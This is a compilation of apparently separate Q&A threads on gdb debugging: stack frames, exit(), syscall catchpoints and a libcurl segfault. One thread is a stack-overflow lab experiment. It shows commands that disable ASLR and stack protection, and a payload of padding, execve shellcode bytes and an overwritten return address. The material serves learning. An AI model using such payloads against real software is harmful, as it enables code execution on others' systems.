I have a piece of code that just strcpy()s argv[1] into a 100-byte buffer. After that, for testing purposes, I call exit(0) or exit(1). Nothing else is used. What I get back from gdb is the following:
(gdb) i r eip
eip 0x8048455 0x8048455 <main+65>
(gdb) info frame
Stack level 0, frame at 0xbffff260:
eip = 0x8048455 in main (exploitable.c:9); saved eip 0x41414141
source language c.
Arglist at 0xbffff258, args: argc=1094795585, argv=0xbffff304
Locals at 0xbffff258, Previous frame's sp is 0xbffff260
Saved registers:
ebp at 0xbffff258, eip at 0xbffff25c
(gdb) i r eip
eip 0x8048455 0x8048455 <main+65>
(gdb) c
Continuing.
[Inferior 1 (process 2829) exited normally]
Since the saved eip is 0x41414141, why doesn't execution go to the invalid address 0x41414141 after leaving the current stack frame? It surely has something to do with the exit function, but I can't understand it :/
I know that the explanation is in the following code, but I can't get it:
=> 0x08048455 <+65>: mov DWORD PTR [esp],0x0
0x0804845c <+72>: call 0x8048350 <exit@plt>
The last line implies that execution goes to the exit function, and I'm not sure whether the line at 0x08048455 is the 0 argument being passed to exit. Doesn't the exit function execute any leave / ret instructions when it runs? Because the saved eip of the frame that is "just" outside main is overwritten!
The exit function does not return. It calls the functions registered with atexit(), does some cleanup, and terminates the process through the kernel's exit system call, so the overwritten saved eip of main is never used.
Use return 1 / return 0 instead of exit(1) / exit(0) if you want to check what happens to EIP after main() finishes.
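As a rough illustration of why the saved return address never matters here, the following sketch (assuming a POSIX system) forks a child that leaves via exit() from inside a nested call. The helper names child_exit_status, leave_via_exit and on_exit_handler are made up for this example and are not part of the original program.

```c
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Registered with atexit() in the child; runs during exit(). */
static void on_exit_handler(void)
{
    static const char msg[] = "atexit handler ran\n";
    ssize_t n = write(STDERR_FILENO, msg, sizeof msg - 1);
    (void)n; /* best-effort message, result deliberately ignored */
}

/* Hypothetical helper: terminates the process from a nested call. */
static void leave_via_exit(int code)
{
    exit(code); /* does not return, so no ret is executed for this frame */
}

/*
 * Fork a child that calls exit(code) and return the exit status the
 * parent observes, or -1 on error.
 */
int child_exit_status(int code)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        atexit(on_exit_handler);
        leave_via_exit(code);
        _exit(99); /* not reached: exit() never comes back */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Calling child_exit_status(1) should report 1: the child terminates inside exit(), and the frames above it are never unwound with ret.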
I've recently become interested in reading books and articles about hacking, and I found out that Hacking: The Art of Exploitation is a must-read title. I am following the basic tutorials on how to work with standard Linux tools and analyze your code (Programming chapter). I am not a beginner in programming, but working with the Linux terminal is quite new for me. I am using the latest release of Kali Linux.
Right now my simple program below should be used to analyze how the stack segment works.
int main(){
void stack_func(int a,int b, int c, int d){
char first;
int second;
first = 'c';
second = 220;
}
stack_func(1,2,3,4);
return 0;
}
The first problem is that I cannot add any breakpoints for internal functions, neither my own functions like stack_func() nor functions from libraries like strcpy. According to the book, the pending breakpoint should resolve. Mine is just ignored and the program finishes.
root@root:~/Folder# gdb -q ./stack
Reading symbols from ./stack...done.
(gdb) b stack_func
Function "stack_func" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (stack_func) pending.
(gdb) run
Starting program: /root/Folder/stack
[Inferior 1 (process 20421) exited normally]
(gdb)
The second problem is that disassemble also doesn't work for my function. Again according to the book I should be able to see assembler code for my function stack_func() but the result is below.
(gdb) disass stack_func()
No symbol "stack_func" in current context.
(gdb)
I apologize for any grammatical errors in the text. :)
The problem is that you defined stack_func inside another function. This is called a nested function, and it is a GCC extension in GNU C. Such a function gets a slightly different symbol name than you expect. To find out its exact symbol name you can use the nm tool:
[ tmp]$ nm a.out |grep stack_func
00000000004004a6 t stack_func.1761
Then set the breakpoint and disassemble in gdb, quoting that name:
[ tmp]$ gdb -q ./a.out
Reading symbols from ./a.out...done.
(gdb) b 'stack_func.1761'
Breakpoint 1 at 0x4004ba: file 111.c, line 6.
(gdb) disassemble 'stack_func.1761'
Dump of assembler code for function stack_func:
0x00000000004004a6 <+0>: push %rbp
0x00000000004004a7 <+1>: mov %rsp,%rbp
0x00000000004004aa <+4>: mov %edi,-0x14(%rbp)
0x00000000004004ad <+7>: mov %esi,-0x18(%rbp)
0x00000000004004b0 <+10>: mov %edx,-0x1c(%rbp)
0x00000000004004b3 <+13>: mov %ecx,-0x20(%rbp)
0x00000000004004b6 <+16>: mov %r10,-0x28(%rbp)
0x00000000004004ba <+20>: movb $0x63,-0x1(%rbp)
0x00000000004004be <+24>: movl $0xdc,-0x8(%rbp)
0x00000000004004c5 <+31>: nop
0x00000000004004c6 <+32>: pop %rbp
0x00000000004004c7 <+33>: retq
End of assembler dump.
(gdb)
OS: GNU/Linux
Distro: OpenSuSe 13.1
Arch: x86-64
GDB version: 7.6.50.20130731-cvs
Program language: mostly C with minor bits of assembly
Imagine that I've got a rather big program that sometimes fails to open a file. Is it possible to set a breakpoint in GDB in such a way that it stops after the open(2) syscall returns -1?
Of course, I can grep through the source code and find all open(2) invocations and narrow down the faulting open() call but maybe there's a better way.
I tried to use "catch syscall open" then "condition N if $rax==-1" but obviously it didn't get hit.
BTW, is it possible to distinguish between a call to a syscall (e.g. open(2)) and the return from a syscall (e.g. open(2)) in GDB?
As a current workaround I do the following:
Run the program in question under the GDB
From another terminal launch systemtap script:
stap -g -v -e 'probe process("PATH to the program run under GDB").syscall.return { if( $syscall == 2 && $return <0) raise(%{ SIGSTOP %}) }'
After open(2) returns -1 I receive SIGSTOP in GDB session and I can debug the issue.
TIA.
Best regards,
alexz.
UPD: Even though I had tried the approach suggested by n.m. before and wasn't able to make it work, I decided to give it another try. After 2 hours it now works as intended, but with a weird workaround:
I still can't distinguish between the call to and the return from a syscall
If I use finish in comm, I can't use continue after it, which is expected according to the GDB docs
i.e. the following does drop to gdb prompt on each break:
gdb> comm
gdb> finish
gdb> printf "rax is %d\n",$rax
gdb> cont
gdb> end
Actually I can avoid using finish and check %rax in commands, but in this case I have to check for -errno rather than -1, e.g. if it's "Permission denied" then I have to check for -13, and if it's "No such file or directory" then for -2. That is simply not right.
So the only way to make it work for me was to define custom function and use it in the following way:
(gdb) catch syscall open
Catchpoint 1 (syscall 'open' [2])
(gdb) define mycheck
Type commands for definition of "mycheck".
End with a line saying just "end".
>finish
>finish
>if ($rax != -1)
>cont
>end
>printf "rax is %d\n",$rax
>end
(gdb) comm
Type commands for breakpoint(s) 1, one per line.
End with a line saying just "end".
>mycheck
>end
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/alexz/gdb_syscall_test/main
.....
Catchpoint 1 (returned from syscall open), 0x00007ffff7b093f0 in __open_nocancel () from /lib64/libc.so.6
0x0000000000400756 in main (argc=1, argv=0x7fffffffdb18) at main.c:24
24 fd = open(filenames[i], O_RDONLY);
Opening test1
fd = 3 (0x3)
Successfully opened test1
Catchpoint 1 (call to syscall open), 0x00007ffff7b093f0 in __open_nocancel () from /lib64/libc.so.6
rax is -38
Catchpoint 1 (returned from syscall open), 0x00007ffff7b093f0 in __open_nocancel () from /lib64/libc.so.6
0x0000000000400756 in main (argc=1, argv=0x7fffffffdb18) at main.c:24
---Type <return> to continue, or q <return> to quit---
24 fd = open(filenames[i], O_RDONLY);
rax is -1
(gdb) bt
#0 0x0000000000400756 in main (argc=1, argv=0x7fffffffdb18) at main.c:24
(gdb) step
26 printf("Opening %s\n", filenames[i]);
(gdb) info locals
i = 1
fd = -1
This gdb script does what's requested:
set $outside = 1
catch syscall open
commands
silent
set $outside = ! $outside
if ( $outside && $rax >= 0)
continue
end
if ( !$outside )
continue
end
echo `open' returned a negative value\n
end
The $outside variable is needed because gdb stops both at syscall enter and syscall exit. We need to ignore enter events and check $rax only at exit.
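To try the script, a small target that mixes successful and failing opens is handy. The following is only a sketch of such a target; count_open_failures is a made-up helper name, and the paths passed to it are up to the caller.

```c
#include <fcntl.h>
#include <stddef.h>
#include <stdio.h>
#include <unistd.h>

/*
 * Try to open every path read-only and return how many opens failed.
 * Each failure is reported with perror(), so the gdb stop can be
 * matched against the program's own output.
 */
size_t count_open_failures(const char *const *paths, size_t n)
{
    size_t failures = 0;
    for (size_t i = 0; i < n; i++) {
        int fd = open(paths[i], O_RDONLY);
        if (fd == -1) {
            perror(paths[i]);
            failures++;
        } else {
            close(fd);
        }
    }
    return failures;
}
```

Calling this from main with one existing and one missing path, and running the result under gdb with the script above, should stop only on the missing one. On newer glibc versions open() may be implemented with the openat system call; if the catchpoint never fires, catching openat instead is worth a try.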
Is it possible to set a breakpoint in GDB in such a way that it stops after the open(2) syscall returns -1?
It's hard to do better than n.m.'s answer for this narrow question, but I would argue that the question is posed incorrectly.
Of course, I can grep through the source code and find all open(2) invocations
That is part of your confusion: when you call open in a C program, you are not in fact executing the open(2) system call directly. Rather, you are invoking an open(3) "stub" from your libc, and that stub executes the open(2) system call for you.
And if you want to set a breakpoint when the stub is about to return -1, that is very easy.
Example:
/* t.c */
#include <sys/stat.h>
#include <fcntl.h>
int main()
{
int fd = open("/no/such/file", O_RDONLY);
return fd == -1 ? 0 : 1;
}
$ gcc -g t.c; gdb -q ./a.out
(gdb) start
Temporary breakpoint 1 at 0x4004fc: file t.c, line 6.
Starting program: /tmp/a.out
Temporary breakpoint 1, main () at t.c:6
6 int fd = open("/no/such/file", O_RDONLY);
(gdb) s
open64 () at ../sysdeps/unix/syscall-template.S:82
82 ../sysdeps/unix/syscall-template.S: No such file or directory.
Here we've reached the glibc system call stub. Let's disassemble it:
(gdb) disas
Dump of assembler code for function open64:
=> 0x00007ffff7b01d00 <+0>: cmpl $0x0,0x2d74ad(%rip) # 0x7ffff7dd91b4 <__libc_multiple_threads>
0x00007ffff7b01d07 <+7>: jne 0x7ffff7b01d19 <open64+25>
0x00007ffff7b01d09 <+0>: mov $0x2,%eax
0x00007ffff7b01d0e <+5>: syscall
0x00007ffff7b01d10 <+7>: cmp $0xfffffffffffff001,%rax
0x00007ffff7b01d16 <+13>: jae 0x7ffff7b01d49 <open64+73>
0x00007ffff7b01d18 <+15>: retq
0x00007ffff7b01d19 <+25>: sub $0x8,%rsp
0x00007ffff7b01d1d <+29>: callq 0x7ffff7b1d050 <__libc_enable_asynccancel>
0x00007ffff7b01d22 <+34>: mov %rax,(%rsp)
0x00007ffff7b01d26 <+38>: mov $0x2,%eax
0x00007ffff7b01d2b <+43>: syscall
0x00007ffff7b01d2d <+45>: mov (%rsp),%rdi
0x00007ffff7b01d31 <+49>: mov %rax,%rdx
0x00007ffff7b01d34 <+52>: callq 0x7ffff7b1d0b0 <__libc_disable_asynccancel>
0x00007ffff7b01d39 <+57>: mov %rdx,%rax
0x00007ffff7b01d3c <+60>: add $0x8,%rsp
0x00007ffff7b01d40 <+64>: cmp $0xfffffffffffff001,%rax
0x00007ffff7b01d46 <+70>: jae 0x7ffff7b01d49 <open64+73>
0x00007ffff7b01d48 <+72>: retq
0x00007ffff7b01d49 <+73>: mov 0x2d10d0(%rip),%rcx # 0x7ffff7dd2e20
0x00007ffff7b01d50 <+80>: xor %edx,%edx
0x00007ffff7b01d52 <+82>: sub %rax,%rdx
0x00007ffff7b01d55 <+85>: mov %edx,%fs:(%rcx)
0x00007ffff7b01d58 <+88>: or $0xffffffffffffffff,%rax
0x00007ffff7b01d5c <+92>: jmp 0x7ffff7b01d48 <open64+72>
End of assembler dump.
Here you can see that the stub behaves differently depending on whether the program has multiple threads or not. This has to do with asynchronous cancellation.
There are two syscall instructions, and in the general case we'd need to set a breakpoint after each one (but see below).
But this example is single-threaded, so I can set a single conditional breakpoint:
(gdb) b *0x00007ffff7b01d10 if $rax < 0
Breakpoint 2 at 0x7ffff7b01d10: file ../sysdeps/unix/syscall-template.S, line 82.
(gdb) c
Continuing.
Breakpoint 2, 0x00007ffff7b01d10 in __open_nocancel () at ../sysdeps/unix/syscall-template.S:82
82 in ../sysdeps/unix/syscall-template.S
(gdb) p $rax
$1 = -2
Voila, the open(2) system call returned -2, which the stub will translate into setting errno to ENOENT (which is 2 on this system) and returning -1.
If open(2) had succeeded, the condition $rax < 0 would be false, and GDB would keep going.
That is precisely the behavior one usually wants from GDB when looking for one failing system call among many succeeding ones.
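The translation from the raw value in $rax to what the C caller sees can be sketched in a few lines. This is only a model of the stub's error path, not glibc's actual code (which is the assembly shown above); stub_result is a made-up name.

```c
#include <errno.h>

/*
 * Model of the stub's error handling: the kernel signals failure with
 * a value in [-4095, -1] (the cmp against 0xfffffffffffff001 is this
 * range check in unsigned form). The stub stores the positive error
 * code in errno and returns -1; any other value is passed through.
 */
long stub_result(long raw)
{
    if (raw < 0 && raw >= -4095) {
        errno = (int)-raw;
        return -1;
    }
    return raw;
}
```

With the value from the session above, stub_result(-2) returns -1 and leaves errno set to ENOENT, while a valid descriptor such as 3 is returned unchanged.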
Update:
As Chris Dodd points out, there are two syscalls, but on error they both branch to the same error-handling code (the code that sets errno). Thus, we can set an un-conditional breakpoint on *0x00007ffff7b01d49, and that breakpoint will fire only on failure.
This is much better, because conditional breakpoints slow down execution quite a lot when the condition is false (GDB has to stop the inferior, evaluate the condition, and resume the inferior if the condition is false).
I have the following program:
void test_function(int a,int b, int c, int d){
int flag;
char buffer[10];
flag = 31337;
buffer[0]='A';
}
int main(){
test_function(1,2,3,4);
}
I compiled it with gcc's -g option.
I am setting 2 breakpoints: one just before the test_function call inside main and one at the start of test_function.
(gdb) list
1 void test_function(int a,int b, int c, int d){
2 int flag;
3 char buffer[10];
4
5 flag = 31337;
6 buffer[0]='A';
7 }
8
9 int main(){
10 test_function(1,2,3,4);
(gdb) break 10
Breakpoint 1 at 0x804843c: file stackexample.c, line 10.
(gdb) break test_function
Breakpoint 2 at 0x804840a: file stackexample.c, line 1.
(gdb) run
Starting program: /root/tests/c-tests/./stackexample
Breakpoint 1, main () at stackexample.c:10
10 test_function(1,2,3,4);
(gdb) i r esp ebp eip
esp 0xbffff4d0 0xbffff4d0
ebp 0xbffff4e8 0xbffff4e8
eip 0x804843c 0x804843c <main+9>
As far as I know, the address 0xbffff4d0 is the current bottom of the stack (top-highest address), and it will be used as the reference for creating the new stack frame after the call to test_function.
(gdb) x/5i $eip
=> 0x804843c <main+9>: mov DWORD PTR [esp+0xc],0x4
0x8048444 <main+17>: mov DWORD PTR [esp+0x8],0x3
0x804844c <main+25>: mov DWORD PTR [esp+0x4],0x2
0x8048454 <main+33>: mov DWORD PTR [esp],0x1
0x804845b <main+40>: call 0x8048404 <test_function>
Before the test_function call the arguments are stored with these mov instructions.
(gdb) info frame
Stack level 0, frame at 0xbffff4f0:
eip = 0x804843c in main (stackexample.c:10); saved eip 0xb7e8bbd6
source language c.
Arglist at 0xbffff4e8, args:
Locals at 0xbffff4e8, Previous frame's sp is 0xbffff4f0
Saved registers:
ebp at 0xbffff4e8, eip at 0xbffff4ec
(gdb) cont
Continuing.
Breakpoint 2, test_function (a=1, b=2, c=3, d=4) at stackexample.c:1
1 void test_function(int a,int b, int c, int d){
(gdb) info frame
Stack level 0, frame at 0xbffff4d0:
eip = 0x804840a in test_function (stackexample.c:1); saved eip 0x8048460
called by frame at 0xbffff4f0
source language c.
Arglist at 0xbffff4c8, args: a=1, b=2, c=3, d=4
Locals at 0xbffff4c8, Previous frame's sp is 0xbffff4d0
Saved registers:
ebp at 0xbffff4c8, eip at 0xbffff4cc
(gdb) i r esp ebp eip
esp 0xbffff4a0 0xbffff4a0
ebp 0xbffff4c8 0xbffff4c8
eip 0x804840a 0x804840a <test_function+6>
So here it's obvious that the first frame's esp became the starting address of this frame. What I don't get, though, is which stack frame the arguments are in, because...
(gdb) info locals
flag = 134513420
buffer = "\377\267\364\237\004\b\350\364\377\277"
Here we cannot see the args. If we ..
(gdb) info args
a = 1
b = 2
c = 3
d = 4
(gdb) print &a
$4 = (int *) 0xbffff4d0
(gdb) print &b
$5 = (int *) 0xbffff4d4
(gdb) print &c
$6 = (int *) 0xbffff4d8
(gdb) print &d
$7 = (int *) 0xbffff4dc
So here we see that the arguments are starting from the first address that this current stack frame has which is 0xbffff4d0
And the other question is the following according to this output
(gdb) x/16xw $esp
0xbffff4a0: 0xb7fc9ff4 0x08049ff4 0xbffff4b8 0x0804830c
0xbffff4b0: 0xb7ff1080 0x08049ff4 0xbffff4e8 0x08048499
0xbffff4c0: 0xb7fca324 0xb7fc9ff4 0xbffff4e8 0x08048460
0xbffff4d0: 0x00000001 0x00000002 0x00000003 0x00000004
Address 0x08048460 is the saved eip from "eip = 0x804840a in test_function (stackexample.c:1); saved eip 0x8048460" and also appears as "#1 0x08048460 in main () at stackexample.c:10" (output from backtrace).
How come the RET to main is on top of (at a lower address than) the arguments? Shouldn't the return address be at the start of the new stack frame? Sorry, but I am trying to understand how the stack works and I am kind of confused :S Another thing that I don't understand is that local variables are referenced through $esp+(offset). Does the value of esp always depend on the "current" stack frame that execution is in?
Your disassembled program looks like this on my system:
gcc -m32 -c -o stackexample.o stackexample.c
objdump -d -M intel stackexample.o
test_function:
push ebp
mov ebp,esp
sub esp,0x10
mov DWORD PTR [ebp-0x4],0x7a69
mov BYTE PTR [ebp-0xe],0x41
leave
ret
main:
push ebp
mov ebp,esp
sub esp,0x10
mov DWORD PTR [esp+0xc],0x4
mov DWORD PTR [esp+0x8],0x3
mov DWORD PTR [esp+0x4],0x2
mov DWORD PTR [esp],0x1
call test_function
leave
ret
Let's start from the beginning.
Stack is arranged from top to bottom in memory. The top of the stack has the lowest address.
esp is the Stack Pointer. It always points to the top of the stack.
ebp is the Base Pointer. It points to the bottom of current stack frame. It is used for referencing current function's arguments and local variables.
These instructions
push ebp
mov ebp,esp
can be found at the top of every function. They do the following:
save caller's Base Pointer
set up the current function's Base Pointer by copying the Stack Pointer into it. At this point the Stack Pointer points to the bottom of the current stack frame, so after the copy the Base Pointer marks the current bottom. The Stack Pointer can increase/decrease during the function's execution, so you use the Base Pointer to reference the variables. The Base Pointer also serves to preserve the caller's Stack Pointer value.
leave is equivalent to
mov esp, ebp
pop ebp
which is the exact opposite of the instructions above:
restore caller's Stack Pointer
restore caller's Base Pointer
Now to answer your questions
in which stack frame the arguments are ???
Arguments are stored in the caller's stack frame. However, you can use the Base Pointer to access them. By design, info locals does not display function arguments (info args does that):
http://visualgdb.com/gdbreference/commands/info_locals
How come the RET to main is on top of (at a lower address than) the arguments? Shouldn't the return address be at the start of the new stack frame?
That's because the arguments are stored in the caller's frame. When test_function is called, the stack already holds the arguments, so the return address is stored higher on the stack (i.e. at a lower address) than the arguments.
local variables are referenced through $esp+(offset).
As far as I know, referencing local variables can happen both using the Base Pointer and the Stack Pointer - whichever is convenient for your compiler (not really sure).
Does the value of esp always depend on the "current" stack frame that execution is in?
Yes. Stack Pointer is THE most important stack register. It points to the top of the stack.
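The layout described above can be checked with a little address arithmetic. The sketch below assumes the 32-bit calling sequence shown in the disassembly (arguments stored at [esp], then call, then push ebp); the struct and function names are made up for illustration.

```c
#include <stdint.h>

/* Addresses of interest right after the callee's prologue. */
struct frame_layout {
    uint32_t first_arg;   /* where the caller stored argument 1      */
    uint32_t return_addr; /* slot written by the call instruction    */
    uint32_t saved_ebp;   /* slot written by push ebp; the new ebp   */
};

/* esp_before_call: value of esp in the caller just before `call`. */
struct frame_layout layout_after_prologue(uint32_t esp_before_call)
{
    struct frame_layout f;
    f.first_arg   = esp_before_call;     /* mov DWORD PTR [esp],0x1   */
    f.return_addr = esp_before_call - 4; /* call pushes the return address */
    f.saved_ebp   = esp_before_call - 8; /* push ebp; mov ebp,esp     */
    return f;
}
```

Feeding in esp = 0xbffff4d0 from the question gives 0xbffff4d0 for the first argument, 0xbffff4cc for the return address and 0xbffff4c8 for the saved ebp, which matches the "print &a" and "info frame" output shown there.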
I'm doing a stack overflow experiment with ASLR and NX disabled, but gdb shows a weird result.
Environment:
Linux 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali5 i686 GNU/Linux
Disable aslr:
echo 0 > /proc/sys/kernel/randomize_va_space
Compiled the source with execstack (Debian has no kernel parameter named exec-shield):
gcc 1.c -fno-stack-protector -z execstack -mpreferred-stack-boundary=2
Here's description of the problem:
(gdb) disas main
Dump of assembler code for function main:
0x0804841c <+0>: push %ebp
0x0804841d <+1>: mov %esp,%ebp
0x0804841f <+3>: sub $0x208,%esp
0x08048425 <+9>: mov 0xc(%ebp),%eax
0x08048428 <+12>: add $0x4,%eax
0x0804842b <+15>: mov (%eax),%eax
0x0804842d <+17>: mov %eax,0x4(%esp)
0x08048431 <+21>: lea -0x200(%ebp),%eax
0x08048437 <+27>: mov %eax,(%esp)
0x0804843a <+30>: call 0x8048300 <strcpy@plt>
0x0804843f <+35>: mov $0x0,%eax
0x08048444 <+40>: leave
0x08048445 <+41>: ret
End of assembler dump.
(gdb) run `python -c 'print "A"*395 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A"*94 + "\x7d\xf8\xff\xba"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/xxx/tests/a.out `python -c 'print "A"*395 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A"*94 + "\x7d\xf8\xff\xba"'`
Program received signal SIGSEGV, Segmentation fault.
0xbafff87d in ?? ()
The program is directed to 0xbafff87d and crashes. This is as expected.
So I changed the address from 0xbafff87d to the address of the shellcode: 0xbffff87d.
(gdb) run `python -c 'print "A"*395 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A"*94 + "\x7d\xf8\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/xxx/tests/a.out `python -c 'print "A"*395 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A"*94 + "\x7d\xf8\xff\xbf"'`
Program received signal SIGSEGV, Segmentation fault.
0xbffff88d in ?? ()
(gdb) i r $eip
eip 0xbffff88d 0xbffff88d
But the program ends up at 0xbffff88d instead of 0xbffff87d and crashes. The last byte of the return address has been modified. Why?
I tried adding a breakpoint before the 'leave' instruction (0x08048444 <+40>: leave):
(gdb) b *0x08048444
Breakpoint 1 at 0x8048444
#run the program with the large payload as above
Breakpoint 1, 0x08048444 in main ()
(gdb) x/2x $ebp
0xbffff518: 0x41414141 0xbffff87d
#the return addr is indeed overwritten to 0xbffff87d
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xbffff88d in ?? ()
eip still ends up at 0xbffff88d.
I cannot figure out what modifies the return address and when this happens.
Maybe I am missing some knowledge here. Besides the question above, I also think that gdb sometimes 'caches' the result of running the debugged program, because sometimes gdb shows me the same result even though I have already changed the parameters.
Thanks in advance :)
=======
Update for answering Leeor's comment:
It also crashes outside gdb with a segmentation fault. The core dump shows that eip is 0xbffff88b at the time of the segfault. (My overwritten value is 0xbffff87d, so the last byte is modified.)
Manually overwriting the return address:
(gdb) b *0x08048444
Breakpoint 1 at 0x8048444
(gdb) run test
Starting program: /home/xxx/tests/a.out test
Breakpoint 1, 0x08048444 in main ()
(gdb) x/2x $ebp
0xbffff718: 0xbffff798 0xb7e7ae46
(gdb) x/2 0xbffff71c
0xbffff71c: 0xb7e7ae46 0x00000002
(gdb) set *0xbffff71c=0xbffff87d
(gdb) x/2x $ebp
0xbffff718: 0xbffff798 0xbffff87d
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xbffff87d in ?? ()
This works as I expect. (There is no valid shellcode at 0xbffff87d because I ran with the parameter test. I found that when an "illegal instruction" error occurs, gdb still reports it as a segmentation fault.)
But it still doesn't work when I run it with the overflow payload:
(gdb) run `python -c 'print "A"*395 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A"*94 + "\x7d\xf8\xff\xbf"'`
Starting program: /home/xxx/tests/a.out `python -c 'print "A"*395 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A"*94 + "\x7d\xf8\xff\xbf"'`
Breakpoint 1, 0x08048444 in main ()
(gdb) x/2x $ebp
0xbffff508: 0x41414141 0xbffff87d
(gdb) set *0xbffff50c=0xbffff87d
(gdb) x/2x $ebp
0xbffff508: 0x41414141 0xbffff87d
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xbffff88b in ?? ()
The last byte of return address is modified.
I'd say execution goes to the correct address first, just that the instruction there doesn't happen to crash. Try some of the following:
use si instead of c
put a breakpoint on 0xbffff87d
disassemble code at 0xbffff87d
Since your address is on the stack, the contents may be different when stack layout changes. Note that the command line argument is also on the stack, so your runs with test and the actual payload use different stack layout.
I'm using libcurl in my program, and running into a segfault. Before I filed a bug with the curl project, I thought I'd do a little debugging. What I found seemed very odd to me, and I haven't been able to make sense of it yet.
First, the segfault traceback:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fffe77f6700 (LWP 592)]
0x00007ffff6a2ea5c in memcpy () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) bt
#0 0x00007ffff6a2ea5c in memcpy () from /lib/x86_64-linux-gnu/libc.so.6
#1 0x00007ffff5bc29e5 in x509_name_oneline (a=0x7fffe3d9c3c0,
buf=0x7fffe77f4ec0 "C=US; O=The Go Daddy Group, Inc.; OU=Go Daddy Class 2 Certification Authority\375\034<M_r\206\233\261\310\340\371\023.Jg\205\244\304\325\347\372\016#9Ph%", size=255) at ssluse.c:629
#2 0x00007ffff5bc2a6f in cert_verify_callback (ok=1, ctx=0x7fffe77f50b0)
at ssluse.c:645
#3 0x00007ffff72c9a80 in ?? () from /lib/libcrypto.so.0.9.8
#4 0x00007ffff72ca430 in X509_verify_cert () from /lib/libcrypto.so.0.9.8
#5 0x00007ffff759af58 in ssl_verify_cert_chain () from /lib/libssl.so.0.9.8
#6 0x00007ffff75809f3 in ssl3_get_server_certificate ()
from /lib/libssl.so.0.9.8
#7 0x00007ffff7583e50 in ssl3_connect () from /lib/libssl.so.0.9.8
#8 0x00007ffff5bc48f0 in ossl_connect_step2 (conn=0x7fffe315e9a8, sockindex=0)
at ssluse.c:1724
#9 0x00007ffff5bc700f in ossl_connect_common (conn=0x7fffe315e9a8,
sockindex=0, nonblocking=false, done=0x7fffe77f543f) at ssluse.c:2498
#10 0x00007ffff5bc7172 in Curl_ossl_connect (conn=0x7fffe315e9a8, sockindex=0)
at ssluse.c:2544
#11 0x00007ffff5ba76b9 in Curl_ssl_connect (conn=0x7fffe315e9a8, sockindex=0)
...
The call to memcpy looks like this:
memcpy(buf, biomem->data, size);
(gdb) p buf
$46 = 0x7fffe77f4ec0 "C=US; O=The Go Daddy Group, Inc.; OU=Go Daddy Class 2 Certification Authority\375\034<M_r\206\233\261\310\340\371\023.Jg\205\244\304\325\347\372\016#9Ph%"
(gdb) p biomem->data
$47 = 0x7fffe3e1ef60 "C=US; O=The Go Daddy Group, Inc.; OU=Go Daddy Class 2 Certification Authority\375\034<M_r\206\233\261\310\340\371\023.Jg\205\244\304\325\347\372\016#9Ph%"
(gdb) p size
$48 = 255
If I go up a frame, I see that the pointer passed in for buf came from a local variable defined in the calling function:
char buf[256];
Here's where it starts to get weird. I can manually inspect all 256 bytes of both buf and biomem->data without gdb complaining that the memory isn't accessible. I can also manually write all 256 bytes of buf using the gdb set command, without any error. So if all the memory involved is readable and writable, why does memcpy fail?
Also interesting is that I can use gdb to manually call memcpy with the pointers involved. As long as I pass a size <= 160, it runs without a problem. As soon as I pass 161 or higher, gdb gets a sigsegv. I know buf is larger than 160, because it was created on the stack as an array of 256. biomem->data is a little harder to figure, but I can read well past byte 160 with gdb.
I should also mention that this function (or rather the curl method I call that leads to this) completes successfully many times before the crash. My program uses curl to repeatedly call a web service API while it runs. It calls the API every five seconds or so, and runs for about 14 hours before it crashes. It's possible that something else in my app is writing out of bounds and stomping on something that creates the error condition. But it seems suspicious that it crashes at exactly the same point every time, although the timing varies. And all the pointers seem ok in gdb, but memcpy still fails. Valgrind doesn't find any bounds errors, but I haven't let my program run with valgrind for 14 hours.
Within memcpy itself, the disassembly looks like this:
(gdb) x/20i $rip-10
0x7ffff6a2ea52 <memcpy+242>: jbe 0x7ffff6a2ea74 <memcpy+276>
0x7ffff6a2ea54 <memcpy+244>: lea 0x20(%rdi),%rdi
0x7ffff6a2ea58 <memcpy+248>: je 0x7ffff6a2ea90 <memcpy+304>
0x7ffff6a2ea5a <memcpy+250>: dec %ecx
=> 0x7ffff6a2ea5c <memcpy+252>: mov (%rsi),%rax
0x7ffff6a2ea5f <memcpy+255>: mov 0x8(%rsi),%r8
0x7ffff6a2ea63 <memcpy+259>: mov 0x10(%rsi),%r9
0x7ffff6a2ea67 <memcpy+263>: mov 0x18(%rsi),%r10
0x7ffff6a2ea6b <memcpy+267>: mov %rax,(%rdi)
0x7ffff6a2ea6e <memcpy+270>: mov %r8,0x8(%rdi)
0x7ffff6a2ea72 <memcpy+274>: mov %r9,0x10(%rdi)
